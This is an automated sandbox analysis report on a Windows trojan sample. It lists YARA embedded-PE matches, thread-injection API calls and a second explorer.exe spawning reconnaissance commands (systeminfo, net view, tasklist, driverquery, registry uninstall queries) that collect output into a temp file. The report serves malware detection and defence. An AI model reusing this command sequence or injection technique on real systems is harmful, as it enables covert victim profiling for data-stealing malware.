Source: 3.0.explorer.exe.3d80000.72.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3d80000.72.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3b70000.68.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c30000.70.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c30000.70.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c20000.69.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1e00000.51.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e20000.74.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e20000.74.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3de0000.73.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e40000.75.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e40000.75.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e90000.76.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e90000.76.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2bc0000.11.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2bc0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d40000.12.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d70000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.440000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3eb0000.78.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3eb0000.78.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ee0000.79.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1a20000.46.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ef0000.80.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ef0000.80.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3f70000.81.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.42c0000.82.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.42c0000.82.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.2.systeminfo.exe.1e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1da0000.49.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.2.systeminfo.exe.1e0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c20000.69.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3130000.20.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2020000.52.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ea0000.77.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.35f0000.65.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 24.2.tasklist.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e60000.60.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ea0000.77.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 29.2.driverquery.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 29.2.driverquery.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e30000.59.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 34.2.reg.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 34.2.reg.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 39.2.reg.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 39.2.reg.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 24.2.tasklist.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2020000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e40000.32.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.5310000.83.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3140000.64.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3cc0000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1df0000.50.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3de0000.73.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.net.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3f70000.81.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e30000.59.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.net.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3b70000.68.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ee0000.79.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.5310000.41.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.70e0000.84.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1a20000.46.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3cc0000.71.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.net.exe.470000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.net.exe.470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3cc0000.28.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.5310000.83.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3cc0000.71.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.5310000.41.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 24.2.tasklist.exe.640000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 24.2.tasklist.exe.640000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Show sources

Source: C60A.bin.3.dr

Binary string: Boot Device: \Device\HarddiskVolume1

Classification label

Show sources

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winEXE@47/15@3/2

Contains functionality to enum processes or threads

Show sources

Source: C:\Windows\explorer.exe

Code function: 2_2_015518D9 CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,Thread32Next,

2_2_015518D9

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_1_00407E91 SHGetMalloc,SHGetSpecialFolderLocation,SHGetSpecialFolderPathA,AuthzInitializeResourceManager,AuthzFreeResourceManager,GetLastError,MessageBoxA,GetUserDefaultLangID,EnumTimeFormatsA,FindResourceExW,FindResourceExW,LoadResource,

0_1_00407E91

Creates files inside the user directory

Show sources

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\{A29E757B-998D-241A-33F6-DD98178A614C}

Jump to behavior

Creates temporary files

Show sources

Source: C:\Windows\explorer.exe

File created: C:\Users\user~1\AppData\Local\Temp\5F76.bin

Jump to behavior

Found command line output

Show sources

Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w0.............3w..0.............(.................................S...{w..S...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .O.p.e.r.a.t.i.n.g. .S.y.s.t.e.m. .I.n.f.o.r.m.a.t.i.o.n. ...........P...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0.................................<.............S...{w..S...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .C.o.m.p.u.t.e.r. .I.n.f.o.r.m.a.t.i.o.n. .............S...{w..S.p...@...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0.............................................X.S...{wX.S...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .P.r.o.c.e.s.s.o.r. .I.n.f.o.r.m.a.t.i.o.n. .........X.S...{wX.S.....B...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0..............................................$R...{w.$R...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .B.I.O.S. .I.n.f.o.r.m.a.t.i.o.n. ....................$R...{w.$R.....8...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0.................'.............................S...{w..S...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .I.n.p.u.t. .L.o.c.a.l.e. .I.n.f.o.r.m.a.t.i.o.n. .........{w..S.....H...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0...................................................ww.'....................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .T.i.m.e.Z.o.n.e. .I.n.f.o.r.m.a.t.i.o.n. .................ww.'......@...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0.................4.................................ww.'....................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .P.r.o.f.i.l.e. .I.n.f.o.r.m.a.t.i.o.n. ...................ww.'......>...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0...............................................S...{w..S...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .P.a.g.e.f.i.l.e. .I.n.f.o.r.m.a.t.i.o.n. .............S...{w..S.....@...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0..............................................#R...{w.#R...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .H.o.t.f.i.x. .I.n.f.o.r.m.a.t.i.o.n. ................#R...{w.#R.....<...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w..............3w..0.................................X.............S...{w..S...................2.	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w........L.o.a.d.i.n.g. .N.e.t.w.o.r.k. .C.a.r.d. .I.n.f.o.r.m.a.t.i.o.n. .........{w..S.....H...............	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Console Write: ..........3w..........3w<.............3w..0.................,#..............D.r............. .........................2.	Jump to behavior
Source: C:\Windows\System32\net.exe	Console Write: ....................S.y.s.t.e.m. .e.r.r.o.r. .6.1.1.8. .h.a.s. .o.c.c.u.r.r.e.d...........l.\|...%tl.....B...........8.l.	Jump to behavior
Source: C:\Windows\System32\net.exe	Console Write: ..........................0.....\|............+..........................r.r.e.d...........l.\|...%tl...........-.........	Jump to behavior
Source: C:\Windows\System32\net.exe	Console Write: ....................a.5w..0.....\|............+..................................8.l.......l.\|...%tl.................8.l.	Jump to behavior
Source: C:\Windows\System32\net.exe	Console Write: ..........................0.....\|............,..................................8.l.......l.\|...%tl.....................	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ........a.5w..0.....E.R.R.O.R.:. .............................4w..............4w....P.0.....$...G..w..................0.
Source: C:\Windows\System32\reg.exe	Console Write: ........a.5w..0.....<.......T...S...............................$.....................0.........X...........j.:w...o....

Launches a second explorer.exe instance

Show sources

Source: unknown	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

PE file has an executable .text section and no other executable section

Show sources

Source: rb5iJg6pgN.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Reads ini files

Show sources

Source: C:\Windows\explorer.exe

File read: C:\Program Files\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample might require command line arguments

Show sources

Source: explorer.exe

String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\rb5iJg6pgN.exe 'C:\Users\user\Desktop\rb5iJg6pgN.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\net.exe net view
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\reg.exe reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: unknown	Process created: C:\Windows\System32\reg.exe reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC	Jump to behavior
